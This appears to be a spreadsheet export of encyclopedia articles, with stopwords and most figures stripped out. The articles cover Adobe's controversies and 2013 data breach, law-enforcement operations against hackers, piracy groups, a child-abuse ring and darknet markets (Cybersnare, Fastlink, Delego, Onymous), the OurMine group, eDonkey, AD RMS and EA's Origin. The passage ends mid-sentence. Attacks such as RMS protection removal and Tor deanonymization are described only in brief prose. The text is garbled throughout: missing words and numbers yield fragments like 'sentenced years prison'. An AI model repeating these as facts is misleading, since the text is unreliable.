high-resolution, royalty-free images videos available license (via subscription credit purchase methods). 2015, adobe acquired fotolia, stock content marketplace founded 2005 thibaud elziere, oleg tscheltzoff, patrick chassany operated countries. stand-alone website. adobe experience platform march 2019, adobe released adobe experience platform, consists family content, development, customer relationship management products, calls "next generation" sensei artificial intelligence machine learning framework. reception since 2000, fortune recognized adobe best companies work for. 2021, adobe ranked 16th glassdoor recognized adobe best place work. october 2021, fast company included adobe brands that matter list. october 2008, adobe systems canada inc. named "canada's employers" mediacorp canada inc. featured maclean's newsmagazine.adobe received five-star rating electronic frontier foundation regards handling government data requests 2017. criticisms pricing adobe criticized pricing practices, retail prices twice much non-us countries. example, significantly cheaper return airfare ticket united states purchase particular collection adobe's software locally australia.after adobe revealed pricing creative suite master collection, £1,000 higher european customers, petition protest "unfair pricing" published signed 10,000 users. june 2009, adobe increased prices spite weakening pound dollar, users allowed store.adobe's reader flash programs listed "the hated programs time" article techradar. security hackers exploited vulnerabilities adobe programs, adobe reader, gain unauthorized access computers. adobe's flash player also criticized for, among things, suffering performance, memory usage security problems (see criticism flash player). report security researchers kaspersky criticized adobe producing products security vulnerabilities.observers noted adobe spying customers including spyware creative suite software quietly sending user data firm named omniture. when users became aware, adobe explained suspicious software admitted they: "could better taking security concerns account". when security flaw later discovered photoshop cs5, adobe sparked outrage saying would leave flaw unpatched, anyone wanted software securely would upgrade. following fierce backlash adobe decided provide software patch.adobe criticized pushing unwanted software including third-party browser toolbars free virus scanners, usually part flash update process, pushing third-party scareware program designed scare users paying unneeded system repairs. customer data breach october 2013, company initially revealed million customers' sensitive personal data stolen security breach included encrypted credit card information. adobe later admitted million active users affected attackers obtained access encrypted passwords, well many inactive adobe accounts. company make clear personal information encrypted, email addresses physical addresses, though data privacy laws states require information encrypted.a file stolen adobe containing million usernames, reversibly encrypted passwords unencrypted password hints posted anonnews.org. lastpass, password security firm, said adobe failed best practices securing passwords salted them. another security firm, sophos, showed adobe used weak encryption method permitting recovery information little effort. according expert simon bain, adobe failed customers 'should hang heads shame'.many credit cards tied creative cloud software-by-subscription service. adobe offered affected customers free membership credit monitoring service, similar arrangements made non-us customers. when data breach occurs penalties depend state victim resides, company based.after stealing customers' data, cyber-thieves also accessed adobe's source code repository, likely mid-august 2013. because hackers acquired copies source code adobe proprietary products, could find exploit potential weaknesses security, computer experts warned. security researcher alex holden, chief information security officer hold security, characterized adobe breach, affected acrobat, coldfusion numerous applications, "one worst history". adobe also announced hackers stole parts source code photoshop, according commentators could allow programmers copy engineering techniques would make easier pirate adobe's expensive products.published server russian-speaking hacker group, "disclosure encryption algorithms, security schemes, software vulnerabilities used bypass protections individual corporate data" opened gateway generation zero-day attacks. hackers already used coldfusion exploits make usernames encrypted passwords newswire's customers, tied adobe security breach. they also used coldfusion exploit breach washington state court expose 200,000 social security numbers. anti-competitive practices 1994, adobe acquired aldus corp., software vendor sold freehand, competing product. freehand direct competition adobe illustrator, adobe's flagship vector-graphics editor. federal trade commission intervened forced adobe sell freehand back altsys, also banned adobe buying back freehand similar program next years (1994–2004). altsys bought macromedia, released versions when adobe acquired macromedia december 2005, stalled development freehand 2007, effectively rendering obsolete. with freehand illustrator, adobe controlled products compete professional illustration program market macintosh operating systems.in 2011, group 5,000 freehand graphic designers convened banner free freehand, filed civil antitrust complaint district court northern district california adobe. suit alleged adobe violated federal state antitrust laws abusing dominant position professional vector graphic illustration software market adobe engaged series exclusionary anti-competitive acts strategies designed kill freehand, dominant competitor adobe's illustrator software product, instead competing basis product merit according principals free market capitalism. adobe response claims lawsuit eventually settled. freehand community believes adobe release product open-source community cannot update internally.as 2010, freehand product page, adobe stated, "while recognize freehand loyal customer base, encourage users migrate adobe illustrator software supports powerpc intel-based macs microsoft windows windows vista." 2016, freehand page longer exists; instead, simply redirects illustrator page. adobe's software server still contains directory freehand, empty. cancellation fees april 2021, adobe received heavy criticism company's cancellation fees customer shared tweet showing charged $291.45 cancellation adobe creative cloud subscription. many also showed cancellation fees adobe creative cloud, leading many encouraging piracy adobe products and/or purchase alternatives lower prices using foss software instead. furthermore, reports changing subscriptions possible avoid paying fee. chief executive officers john warnock (1982-2000) bruce chizen (2000-2007) shantanu narayen (2007–present) also adobe digital rights management (drm) list acquisitions adobe list adobe software elcomsoft sklyarov references external links official website business data adobe inc.: "patents owned adobe inc". patent trademark office. retrieved december 2005.</t>
  </si>
  <si>
    <t>Operation Cybersnare</t>
  </si>
  <si>
    <t>operation cybersnare united states secret service operation 1995 targeted computer hackers. january 1995, secret service undercover bulletin board system bergen county, jersey. this first undercover internet sting kind. with help undercover informant, advertised bulletin board across internet. topics discussion cellular telephone cloning computer hacking. september, twelve raids across country resulted arrest hackers. from press release, arrested were: richard lacap, katy, texas, used computer alias "chillin" kevin watkins, houston, texas, used computer alias "led". lacap watkins charged criminal complaint conspiring break computer system oregon cellular telephone company. jeremy cushing, huntington beach, california, used computer alias "alpha bits", charged trafficking cloned cellular telephone equipment stolen access devices used program cellular telephones. frank natoli, brooklyn, york, used computer alias "mmind". charged trafficking stolen access devices used program cellular telephones. bradford, detroit, michigan, used computer alias "cellfone", charged trafficking unauthorized access devices used program cellular telephones. michael clarkson, brooklyn, york, used computer alias "barcode", charged possessing trafficking hardware used obtain unauthorized access telecommunications services. sources pmf, british hacker america jeffrey gold, "internet sting operation nets attempting sell stolen data", associated press, september 1995 geoff boucher, "computer hacker snared cyber-sting technology: huntington beach arrested alleged plot steal credit card cellular phone codes.", angeles times, september 1995 geoff boucher, "on-line sting just beginning, says cyber-sleuth squad", angeles times, september 1995 clifford levy, "secret service goes line after hackers", york times, september 1995 reily gregson, "secret service attacks cellular fraud source, stops computer hackers", wireless, september 1995 ctia press release: "wireless industry salutes u.s. secret service", september 1995. (archived)</t>
  </si>
  <si>
    <t>Operation D-Elite</t>
  </si>
  <si>
    <t>operation d-elite operation agents united states' federal bureau investigation immigration customs enforcement agency leading members elitetorrents, bittorrent tracker site, resulting five months prison, five months home arrest, $3,000 fine grant stanley october 2006. another administrator site, scott mccausland, received sentence december 2006.on 2005, authorities executed search warrants across united states seized elitetorrents domain. like previous actions bittorrent sites lokitorrent, authorities obtained server logs people downloading uploading site's bittorrent tracker. january 2007, action taken vast majority normal members lokitorrent elitetorrents. prelude elitetorrents singled among large number bittorrent sites elitetorrents released star wars: episode revenge sith workprint approximately hours prior movie's theatrical release. this attracted attention mpaa, monitors bittorrent sites. mpaa began collecting information pressuring federal bureau investigation take form action. addition star wars workprint, owner elitetorrents domain name lived united states, made site easier target u.s. authorities. however, site's server located netherlands, bittorrent trackers located server continued operate. when site first taken down, people tried access confronted notice, apparently created microsoft word, owners announce site victim ddos attack type hoax. however, early hours united states department justice announced taken website. people charged grant stanley five months' jail time, five months' home arrest, $3,000 fine leveled october 2006 scott mccausland five months' jail time, five months' home arrest, $3,000 fine leveled october 2006 known online "r313007", drexel university graduate. 2005, arrested connection uploading star wars episode part operation d-elite faced steep jail term plead guilty conspiracy copyright infringement. while shared movies like harry potter prisoner azkaban, flight phoenix, king arthur computer server 133,000 users access high user. floyd miller, prosecutor u.s. attorney's office philadelphia charged said, "they [other elite torrent members] threatened kick organization uploading much pirates doing," part guilty plea sentenced three years' probation, $15,000 fine hours' community service. also operation buccaneer operation fastlink operation site down references</t>
  </si>
  <si>
    <t>Overnet</t>
  </si>
  <si>
    <t>edonkey2000 (nicknamed "ed2k") peer-to-peer file sharing application developed company metamachine (jed mccaleb yagan), using multisource file transfer protocol. this client supports edonkey2000 network overnet network. september 2005, edonkey discontinued following cease desist letter riaa. edonkey2000 network users edonkey2000 network predominantly share large files tens hundreds megabytes, images, videos, games, software programs. ease file searching, websites list checksums sought-after files form ed2k link. some websites also lists active servers users update. metamachines also created another file-sharing network called overnet, interoperates edonkey network, without servers. most edonkey clients also overnet network. 2004, metamachines announced would stop development overnet concentrate edonkey2000 (though edonkey2000 client includes overnet protocol). edonkey since closed down. early history design edonkey2000 created mccaleb, cofounder stellar, first released september 2000. september 2000, client server versions available microsoft windows linux. compared earlier file-sharing program napster, edonkey2000 featured "swarming" downloads, meaning clients could download different pieces single file different peers, effectively utilizing combined bandwidth peers instead limited bandwidth single peer. first, servers isolated another napster, later versions edonkey2000 server software enabled servers form search network. this allowed servers forward search queries locally connected clients servers, allowing clients effectively find peers connected server server network, thereby increasing download swarm size. also allowed clients find download files available clients connected server. third improvement compared napster file hashes instead simple filenames search results. file searches initiated user keyword-based matched filename list stored edonkey2000 server, server returned list filenames paired hash values files client. when selecting file list presented user, client would actually initiate download hash value. this meant file could many different filenames across different peers, would considered identical purposes downloading hash same. two-level (client server) peer-to-peer network architecture offered balance centralized systems like napster, decentralized systems like gnutella. where napster ultimately proved vulnerable centralized server cluster, stable target legal action. gnutella's original design, featuring total elimination server network favor purely peer-to-peer searching, quickly proved infeasible massive search traffic overhead peers. later 2nd-level file sharing systems similar design edonkey2000 (downloading files pieces hash multiple peers simultaneously) innovate design server network, case bittorrent, separates file search feature ("torrent search") download peer locating feature ("torrent tracker"). edonkey2000 client latest version official edonkey2000 client included plugin allowed bittorrent files downloaded. once torrent download begins search facility within edonkey find file within edonkey/overnet network synchronise download. this effectively allowed torrent used another source download, vastly increasing speed well virtually eliminating problems fakes. torrents "clean" terms falsely labelled files file size verifiers addition edonkey2000's user-based fake warning system vastly improved network's functionality. effectively combining range existing overnet edonkey networks lightning-fast file distribution bittorrent system, edonkey2000 following growing trend amongst peer-to-peer programmes integrating downloads multiple networks. this advantage maximising number files available limiting vulnerability problems single network. edonkey sued riaa september 2005, officials company metamachine received cease desist letter riaa result june 2005 supreme court ruling studios grokster makers software facilitates copyright infringement liable infringement. many news sites reported september 2005, metamachine's corporate offices closed. this apparently inaccurate, based aforementioned news sites checking edonkey headquarters york (the ones jersey, moved there). however, september 2005, edonkey officially closed doors. metamachine president yagan said statement company would "convert edonkey's user base online content retailer operating closed environment," "such transaction take place soon reach settlement riaa". this little effect network whole, edonkey clients made small minority whole network. september 2006 reported metamachine, inc. agreed settle riaa million, website replaced text advertisement reflecting riaa's interpretation copyright law. nevertheless, edonkey network still available clients, emule amule. also comparison edonkey software comparison file sharing applications edonkey network references external links client plugin edonkey2000 archived news november 2000 internet archive snapshot edonkey2000.com home page showing original release announcement edonkey2000 overview february 2001 internet archive snapshot edonkey2000.com overview page explaining network architecture edonkey2000 overnet august 2006 internet archive snapshot edonkey.com home page news edonkey2000 becomes emule project september 2005 newswire article slashdot.org article "edonkey pays recording industry $30m" september 2006</t>
  </si>
  <si>
    <t>OurMine</t>
  </si>
  <si>
    <t>ourmine hacker group known hacking popular accounts websites, jack dorsey mark zuckerberg's twitter accounts. group often causes cybervandalism advertise commercial services, among reasons widely considered "white hat" group. history 2016 2016, ourmine hacked twitter accounts wikipedia co-founder jimmy wales, pokémon creator john hanke, twitter co-founder jack dorsey, google sundar pichai, facebook co-founder mark zuckerberg, whose pinterest also hacked. addition social media accounts, group hacked website techcrunch.in october, buzzfeed news published article linking ourmine group saudi arabian teenager using name ahmad makki social media. ourmine denied allegations, claiming makki "fan" group. article's publication, ourmine infiltrated buzzfeed's website altered content several posts read "hacked ourmine".other 2016 hacks include twitter accounts sony president shuhei yoshida; wikimedia global account jimmy wales; twitter accounts netflix marvel; twitter accounts sony music global; instagram accounts national geographic; twitter accounts national geographic photography. 2017 2017, ourmine hacked medium website employee account. account part strategic partnerships team, allowing ourmine hijack blogs belonging fortune backchannel.twitter accounts hacked 2017 included david guetta, york times, wwe, game thrones (along shows, hbo's official account). they also hacked twitter facebook accounts playstation (including claimed leak playstation network databases), barcelona, real madrid (including youtube channel); several facebook accounts also hacked.some youtube accounts hacked ourmine 2017 included omnia media network, gaining access numerous channels; various youtube channels studio71 network also hacked.on august ourmine left message homepage wikileaks. "hi, it’s ourmine (security group), don’t worry testing your…. blablablab, wait, security test! wikileaks, remember challenged hack you?" messages went accuse anonymous trying false information included exhortation spread #wikileakshack twitter. message visible site accessed certain locations. time publication, visitors site greeted message saying wikileaks’ account suspended.in september 2017, ourmine claimed responsibility hacking vevo publishing internal documents. 2020 january, ourmine compromised twitter, facebook instagram accounts teams.in february, ourmine compromised facebook's twitter account. later month, also compromised twitter account south korean band, 127.in may, group ourmine invaded brazilian streaming platform globoplay sent notification users globoplay app. references</t>
  </si>
  <si>
    <t>Active Directory Rights Management Services</t>
  </si>
  <si>
    <t>active directory rights management services rms, known rights management services windows server 2008) server software information rights management shipped windows server. uses encryption form selective functionality denial limiting access documents corporate e-mails, microsoft word documents, pages, operations authorized users perform them. companies technology encrypt information stored document formats, policies embedded documents, prevent protected content decrypted except specified people groups, certain environments, certain conditions, certain periods time. specific operations like printing, copying, editing, forwarding, deleting allowed disallowed content authors individual pieces content, administrators deploy templates group rights together predefined rights applied masse. debuted windows server 2003, client libraries made available windows 2000 later. rights management client included windows vista later, available windows windows 2000 windows server 2003. addition, implementation office rights protection third-party products available rights protection android, blackberry windows attacks policy enforcement capabilities april 2016, alleged attack implementations (including azure rms) published reported microsoft. published code allows authorized user granted right view protected document remove protection preserve file formatting. this sort manipulation requires user granted rights decrypt content able view while rights management services makes certain security assertions regarding inability unauthorized users access protected content, differentiation different usage rights authorized users considered part policy enforcement capabilities, microsoft claims implemented "best effort", considered microsoft security issue policy enforcement limitation. previously enforced signing code using capabilities order provide level control applications interacted rms, capability later removed limited ability restrict behaviors given possibility write applications services directly obtain licenses decrypt content.in addition, using technique, user granted rights view protected document manipulate content document without leaving traces manipulation. since azure non-repudiation solution and, unlike document signing solutions, claim provide anti-tampering capabilities, since changes made users granted rights document, microsoft consider later issue actual attack claimed capabilities rms. researchers provide proof concept tool, allow evaluation results, github. software support natively supported following products: microsoft office 2003 later: word, excel, powerpoint, outlook, infopath microsoft office 2011 later: word, excel, powerpoint, outlook sharepoint 2007 later exchange server 2007 later paper specification (xps)third-party solutions, secure islands (acquired microsoft), gigatrust liquid machines (acquired check point) support following: sharepoint 2003 microsoft visio microsoft project adobe acrobat internet explorer also microsoft servers references external links windows rights management services client downloads rms-enabling applications troubleshooting windows rights management services (rms) root certification server warning active directory rights management summary active directory rights management services active directory rights management services technet active directory rights management services msdn secure islands iqprotector information protection control using microsoft windows technical overview</t>
  </si>
  <si>
    <t>Operation Delego</t>
  </si>
  <si>
    <t>operation delego major international enforcement investigation launched 2009, dismantled international pedophile ring operated invitation-only internet site named dreamboard featured incentives images violent sexual abuse young children twelve, including infants. only charges filed approximately members dreamboard extensive encryption involved. members required upload material least every days maintain access remain good standing. operation delego spinoff investigation leads developed "operation nest egg," prosecution another online group dedicated sharing disseminating child pornography. operation nest spinoff investigation developed leads related another international investigation, "operation joint hammer," targeted transnational rings child pornography trafficking. dozens enforcement agencies involved worldwide delego, including eurojust, arrests made five continents. twenty charged, however, known internet handles, individually charged john does remain large. however, indictments unsealed august 2011, names involved dreamboard publicly available. united states department homeland security secretary janet napolitano stated news conference "the board vehicle distribution terabytes child pornography, roughly equivalent 16,000 dvds," making dhs's largest child porn bust history. launched 2009 federal enforcement, operation delego resulted arrest people countries including canada, denmark, ecuador, france, germany, hungary, kenya, netherlands, philippines, qatar, serbia, sweden switzerland, according united states department justice attorney general eric holder. furthermore, according federal agents, dreamboard's servers located shreveport, louisiana, site's administrators france canada. operation delego ongoing. arrests arrests occurred following countries: canada, denmark, ecuador, france, germany, hungary, kenya, netherlands, philippines, qatar, serbia, sweden, switzerland, convictions 2011, timothy gentry, burlington, ky., sentenced years prison. 2011, michael biggs, orlando, fla., sentenced years prison. june 2011, michael childs, huntsville, ala., sentenced years prison. june 2011, christopher luke, tonawanda, sentenced years prison engaging child exploitation enterprise. july 2011, charles christian, tilton, ill., sentenced years prison. july 2012, robert cuff, sentenced life prison producing distributing child pornography. jonathan mayer, newport, tenn., shane micah turner, roy, utah, sentenced connection participation dreamboard bulletin board. each received sentence years prison followed lifetime supervised release, result defendants pleading guilty conspiring advertise child pornography. sentences handed u.s. district judge maurice hicks. 2012 john wyss, "bones," monroe, wisconsin, found guilty, four-day jury trial, count engaging child exploitation enterprise, count conspiracy advertise child pornography count conspiracy distribute child pornography. september 2012 wyss sentenced life prison.a total individuals, including wyss, charged result operation delego. date, charged defendants arrested united states abroad. individuals pleaded guilty. individuals pleaded guilty roles conspiracy sentenced prison received sentences ranging years life prison. charged individuals remain large known online identities. efforts identify apprehend individuals continue. january 2013, david ettlinger, "ee1", newton, massachusetts sentenced serve years prison. addition prison term, ettlinger sentenced lifetime supervised release.on july 2013, final defendants, arrested thus far, dreamboard child exploitation child pornography ring sentenced federal prison. christopher blackford, charleston, s.c., sentenced years federal prison u.s. district court judge maurice hicks western district louisiana. addition prison sentence, blackford faces lifetime supervised release. blackford admitted april guilty plea joined dreamboard december 2009 contributed posts online bulletin board contained child pornography. william davis, bristol, n.h., sentenced years federal prison addition lifetime supervised release. davis admitted april guilty plea posted advertisements offering distribute child pornography members board. references external links brazthumper complaint, blackbart indictment, hawkeye indictment, twitched indictment,</t>
  </si>
  <si>
    <t>Operation Fastlink</t>
  </si>
  <si>
    <t>operation fastlink coordination four separate, simultaneous undercover investigations federal bureau investigation (fbi) cyber division, department justice, computer crimes intellectual property section (ccips) criminal division interpol. four different investigations publicly enumerated, u.s. department justice said least press release "operation higher education" largest component, participation twelve nations. mention also made investigation pre-release music groups agents washington field office. march 2009, states operation fastlink yielded convictions. raids occurred similar fashion operation buccaneer operation site down. other somewhat-related enforcement actions include operation gridlock operation d-elite. operation successful busts nearly individuals involved illegal copying copyrighted software, alterations thereof, worldwide. there around total searches executed american states foreign countries. foreign searches conducted belgium, denmark, france, germany, hungary, israel, netherlands, singapore, sweden, well united kingdom. among prolific warez release groups targeted fastlink fairlight, kalisto, echelon, class, deviance—all specialized spreading unlicensed copies computer console video games. recent convictions included members music release groups apocalypse production crew chromance. cases jathan desir (known "jd333"), university iowa student iowa city, iowa, pleaded guilty december 2004 charges related role sentenced year's probation, $5,000 fine, $300 assessment, completed 2010. case 4:04-cr-00336 u.s. district court southern district iowa. abell (known "joebob") pleaded guilty conspiracy commit copyright infringement february 2005. sentenced months prison, hours community service years' probation. case 5:04-cr-00681 u.s. district court western district texas. (known "doplgnger") pleaded guilty count conspiracy commit criminal copyright infringement january 2006 related administering several warez sites. sentenced june 2007 three years probation, first months must serve confined home. also ordered fine amount $7,200 perform hours community service. case 3:06-cr-00004 u.s. district court district connecticut. kleinberg (known "basilisk") pleaded guilty march 2005 faces maximum sentence years prison. sentencing originally scheduled july 2005, delayed january 2006. admitted supplier fairlight kalisto executive editor game over online magazine. case 3:05-cr-00049 u.s. district court district connecticut. kleinberg eventually received reduced sentence years' probation, hours community service ordered $15,000 fine. jeffrey lerman (known "ht"), university maryland, college park student long island, york, pleaded guilty march 2005 sentenced months house arrest, three years' probation, $7,500 fine. lerman repackaged restructured playstation games, originally distributed dvds, redistribution kalisto. case 3:05-cr-00050 u.s. district court district connecticut. albert bryndza, flushing, york, pleaded guilty march 2005, sentenced three years' probation ordered fine $7,500 case 3:05-cr-00051 u.s. district court district connecticut. weiss pleaded guilty september 2005 criminal copyright infringement. sentenced january 2006 three years' probation, $20,914 restitution, complete hours community service. unknown case u.s. district court eastern district york. ringe indicted criminal copyright infringement september 2005. unknown case u.s. district court district arizona. christopher streit originally indicted criminal copyright infringement charge southern district iowa. march 2005, case transferred eastern district north carolina. pleaded guilty april 2005 sentenced five years' probation, days home confinement, imposed $500 fine september 2005. case 5:05-cr-00066 u.s. district court eastern district north carolina. joseph huss jr., pleaded guilty counts conspiracy criminal copyright infringement july 2005. sentenced five years' probation, $200 special assessment, $5,000 fine counts november 2005. case 2:05-cr-00002 u.s. district court eastern district pennsylvania. timothy mentzer's three criminal copyright infringement charges transferred southern district iowa. pleaded guilty august 2005. scheduled sentenced june 2006. case 2:05-cr-00002 u.s. district court eastern district pennsylvania. george scott hayes, danville, virginia, pleaded guilty february 2006 count criminal copyright infringement related involvement music release group "chromance." sentencing scheduled 2006. case 1:06-cr-00032 u.s. district court eastern district virginia. derek borchardt (known 'mickey'), charlotte, north carolina; ramiesh yogarada, winston-salem, north carolina; matthew howard, longmont, colorado; aaron jones, hillsboro, oregon pleaded guilty february 2006 count conspiracy commit copyright infringement involvement music release group apocalypse production crew. sentencing scheduled 2006. case 1:06-cr-00041 u.s. district court eastern district virginia. sergey ribiakost, bardonia, york, pleaded guilty april 2007 count conspiracy commit copyright infringement involvement music release group apocalypse production crew. august 2007, ribiakost sentenced years probation fine $3000. case 1:06-cr-00373 u.s. district court eastern district virginia bryan thomas black, waterloo, illinois pleaded guilty march 2009 count conspiracy commit criminal infringement copyright involvement multinational software infringement organization. august 2009, black sentenced years probation.varying degrees information cases obtained (for nominal fee) various courts' electronic document retrieval systems pacer account. also operation buccaneer operation d-elite operation site down references external links justice department announces international internet piracy sweep, press release announcing operation (april 2004) first ‘operation fastlink' defendant pleads guilty online software piracy, press release desir plea (december 2004) officials unseal piracy records jathan desir, first person prosecuted following raid (december 2004) first u.s. convictions largest ever multinational investigation internet piracy, press release kleinberg, lerman, bryndzda guilty pleas (march 2005) justice department announces four pleas internet music piracy crackdown, press release borchardt, howard, jones, hayes guilty pleas (february 2006) defendants plead guilty internet music piracy crackdown, press release gomez ribiakost guilty pleas (april 2007) software piracy crackdown ‘operation fastlink’ yields 50th guilty plea, press release eaves guilty plea (may 2007)</t>
  </si>
  <si>
    <t>Origin (service)</t>
  </si>
  <si>
    <t>origin digital distribution platform developed electronic arts purchasing playing video games. platform's software client available personal computer mobile platforms. origin contains social features profile management, networking friends chat direct game joining along in-game overlay, streaming twitch sharing game library community integration networking sites like facebook, xbox live, playstation network, nintendo network. 2011, electronic arts stated wanted origin match valve's steam service, origin's primary competitor, adding cloud game saves, auto-patching, achievements, cross-platform releases. 2013, origin million registered users.ea announced september 2020 plans retire origin favor desktop client play service future. components origin store origin store allows users browse purchase games electronic arts' catalogs. instead receiving box, disc, even key, purchased software immediately attached user's origin account downloaded corresponding origin client. origin guarantees download availability forever purchase, limit number times game downloaded. users also certain games origin account using keys retail copies, digital copies obtained digital distribution services. however, addition retail keys origin restricted games 2009 onwards older keys work even game available origin, unless user contacts customer support. origin client origin client self-updating software allows users download games, expansion packs, content booster packs patches electronic arts. shows status components available. origin client designed similar competitor, steam. origin game overlay client disabled playing games. client also features chat features friends list group chat options (implemented version 9.3). client download performance patched improved past updates. play released subscription service accessing playing games 2016 originally called access; origin client, called origin access. users choose paying monthly yearly subscription access large collection titles (known vault). origin access subscribers also discount origin purchases. starting march 2018, origin access starting offering titles warner bros. interactive entertainment looking publishers' titles, including indie games.at 2018 announced premium tier origin access called origin access premier, allows play future games early, games full version contrast "first trials" giving basic origin access members. streamline branding, renamed access origin access play, origin access premier named play pro.in september 2020, announced plans retire origin favor desktop client called desktop" support play play subscriptions. expected origin content carry desktop client fully released. desktop client began beta test september 2020 planned date full release. history downloader launched late 2005. replaced link november 2006, adding trailers, demos special content content delivery service. september 2007, replaced combination store download manager. users purchase store website downloadable eadm client download games. games bought link downloadable using download manager. store client reopened origin name june 2011.the digital distribution software first used deliver battlefield special forces expansion pack, subsequently titles. biggest product launch software spore creature creator. acquired trademark origin purchased origin systems 1992. origin systems major game studio 1980s 1990s, best known ultima, wing commander, crusader game franchises. removal crysis steam origin exclusives shortly launch origin, crysis pulled steam appeared ea's website "only origin" claim, though remained available distribution services. since stated valve removed crysis imposed "business terms" "this decision result action ea."since then, crysis maximum edition re-release crysis dlcs) released steam, matching ea's story pulling crysis restraints. confirmed battlefield would available steam. game currently available purchase non-origin services gamefly, green gaming gamersgate, origin client must used regardless game purchased. starting release battlefield 2011 november 2019, every first-party game published exclusive origin service. late 2019, began releasing games steam again, starting star wars jedi: fallen order, however, game still uses origin client launch. origin account bans there several instances enforcing bans critics argue comparatively minor infractions, making rude comments bioware's official forums chat. during march 2011, user named "arno" banned allegedly making comment "have sold souls devil?" arno's account banned hours prevented playing origin games. after reporting details incident, website rock, paper, shotgun received statement saying arno's account mistake, future violations forums would interfere origin users' access games.later october november 2011, user banned posting teabagging dead players. another user received 72-hour account suspension posting link network troubleshooting guide forums. interpreted "commercial" link, even though link posted elsewhere forums, ea's corporate support site faq. user permanently banned submitting forum post containing portmanteau "e-peen," slang "electronic penis." privacy security security weaknesses criticized encrypting origin's xmpp chat functionality, available origin origin powered games. unencrypted data includes account numbers, session tokens, well message contents itself. with type data, user accounts might compromised. accusations spying origin's end-user license agreement (eula) gives permission collect information users' computers regardless relation origin program itself, including "application usage (including limited successful installation and/or removal), software, software usage peripheral hardware." initially, eula also contained passage permitting explicitly monitor activity well edit remove material discretion. report news magazine spiegel covered allegations. response controversy, issued statement claiming access information pictures, documents personal data, nothing execution origin program system player, neither collected us." also added sentence eula stating would "use spyware install spyware users' machines," though users must still consent allowing collect information computers. legal issues germany according reports german newspapers, german version origin's eula violates several german laws, mainly laws protecting consumers users' privacy. according thomas hoeren, judge professor information, telecommunication media university münster, german version eula direct translation original without modifications clauses "null void". references external links official website (mobile)</t>
  </si>
  <si>
    <t>Adobe Experience Cloud</t>
  </si>
  <si>
    <t>adobe experience cloud (aec), formerly adobe marketing cloud (amc), collection integrated online marketing analytics products adobe inc. history adobe experience cloud includes analytics, social, advertising, media optimization, targeting, experience management content management products aimed advertising industry hosted microsoft azure. like adobe cloud services (e.g., adobe creative cloud), adobe marketing cloud allows users valid subscriptions download entire collection directly computers open access online updates.the adobe marketing cloud collection introduced public october 2012 adobe began retiring omniture name acquired october 2009. products defunct company integrated step-by-step cloud service includes following eight applications: adobe analytics, adobe target, adobe social, adobe experience manager, adobe media optimizer, adobe campaign (classic standard), audience manager primetime. november 2013, adobe systems introduced mobile features marketing cloud, making smartphones mobile devices targets analytics.on september 2009, omniture, inc. adobe systems announced adobe would acquiring omniture, online marketing analytics business unit orem, utah. deal $1.8 billion, completed october 2009, joined adobe acquisitions software efficient frontier, main components adobe's digital marketing business unit. around 2012, adobe withdrew omniture brand products integrated adobe marketing cloud.in 2013 adobe acquired satellite search discovery renamed adobe dynamic management (adobe dtm) replace adobe manager. adobe launch came 2018. launch next-generation management system. system, designed adobe, released 2018. uses latest technologies this, designed needs modern digital marketing. don’t excuse cost anymore launch free, valid contract adobe only. 2018, adobe announced acquisition magento $1.68 billion. addition magento commerce enable commerce features integrated adobe experience cloud. year, september 2018, adobe acquired marketing automation company marketo. acquisition expected close 2018.in 2021 adobe experience platform launch integrated adobe experience platform suite data collection technologies. products adobe experience manager (aem) enterprise content management system digital asset management. before acquisition, formerly known cq5. adobe campaign enterprise digital campaign marketing system. software provides cloud-based, web-services service manages direct marketing campaigns, leads, resources, customer data analytics. software also allows companies design orchestrate targeted personalized campaigns direct mail, e-mail, sms, more. this software based algorithmic marketing provide personalization. before acquisition, software formerly known neolane. currently, adobe separate versions product name adobe campaign classic (acquired neolane version) adobe campaign standard, complete cloud-based version built developed adobe.* adobe audience manager (aam) data management platform. this software based algorithmic modeling allows data science either expand existing audiences classify personas using lookalike modeling predictive analytics. references</t>
  </si>
  <si>
    <t>Operation Long Arm</t>
  </si>
  <si>
    <t>operation long first internet child pornography crackdown recorded united states, involved united states customs service along danish enforcement. resulted arrests convictions australia. overview early 1992, tip-off arrest miami individual trying child pornography cassette undercover police, discovery bulletin board system based denmark called bamse. network operated annually supply child-porn images exchange. moment shutdown peak active users ranging countries like united states, denmark australia. references</t>
  </si>
  <si>
    <t>Operation Onymous</t>
  </si>
  <si>
    <t>operation onymous international enforcement operation targeting darknet markets hidden services operating network. background operation onymous formed joint enforcement operation federal bureau investigation (fbi) european union intelligence agency europol. international effort also included united states department homeland security, immigration customs enforcement (ice), eurojust. operation part international strategies address problems malware, botnet schemes, illicit markets darknets. also linked drugs effort participation u.s. drug enforcement administration (dea). raids november 2014, number websites, initially claimed 400, shut including drug markets silk road 2.0, cloud hydra. other sites targeted included money laundering sites "contraband sites". operation involved police forces countries. total arrests. 26-year-old software developer arrested francisco accused running silk road pseudonym 'defcon'. defcon "one primary targets". within hours seizure third incarnation site appeared, 'silk road 3.0'; silk road previously seized october 2013, resurrected, weeks later, 'silk road 2.0'.$1 million bitcoin seized, along €180,000 cash, gold, silver drugs. "illicit services" initially claimed shut down, online marketplaces like silk road. complaint filed november 2014 united states district court southern district york, "seeking forfeiture assets following dark market websites operating network", referred sites, fourteen claimed drug markets; others allegedly sold counterfeit currency, forged identity documents stolen credit cards.us european agencies sought publicise claimed success six-month-long operation, "went flawlessly". national crime agency sent tweet mocking users. official europol press release quoted homeland security investigations official, stated: "our efforts disrupted website allows illicit black-market activities evolve expand, provides safe illegal vices, weapons distribution, drug trafficking murder-for-hire."other leading drug markets dark unaffected, agora, evolution andromeda. whereas silk road fact distribute weapons, offer contract killings, evolution allow trade weapons well drugs. prior closure silk road 2.0, agora already carried listings silk road, evolution also expected overtake agora evolution professional operations silk road, advanced security; arrest alleged silk road manager thought largely series careless mistakes.the figure dark sites, widely reported internationally, appeared many news headlines, later adjusted without explanation "upward sites. true figure thought nearer sites, .onion addresses direct. australian journalist cubrilovic claimed discovered seized sites, based crawl onion sites, scam, clone phishing sites. 0-day exploit number sites initially claimed infiltrated speculation zero-day vulnerability network exploited. this possibility downplayed andrew lewman, representative not-for-profit project, suggesting execution traditional police work tracing bitcoins likely. lewman suggested claims "overblown" authorities wanted simply give impression "cracked" deter others using criminal purposes. representative europol secretive method used, saying: "this something want keep ourselves. this, can’t share whole world, want again."it speculated hidden services could deanonymized enforcement replicated research cert carnegie mellon university july 30th patch mitigated issue. sufficient relay nodes ddosed would force traffic route attacking nodes, attacker could perform traffic confirmation attacks aided sybil attack. logs released administrator doxbin partially supported theory.court documents released november 2015 generated serious research ethics concerns security research communities warrantless exploit (which presumably active 2014 february july). project patched vulnerability denied paid 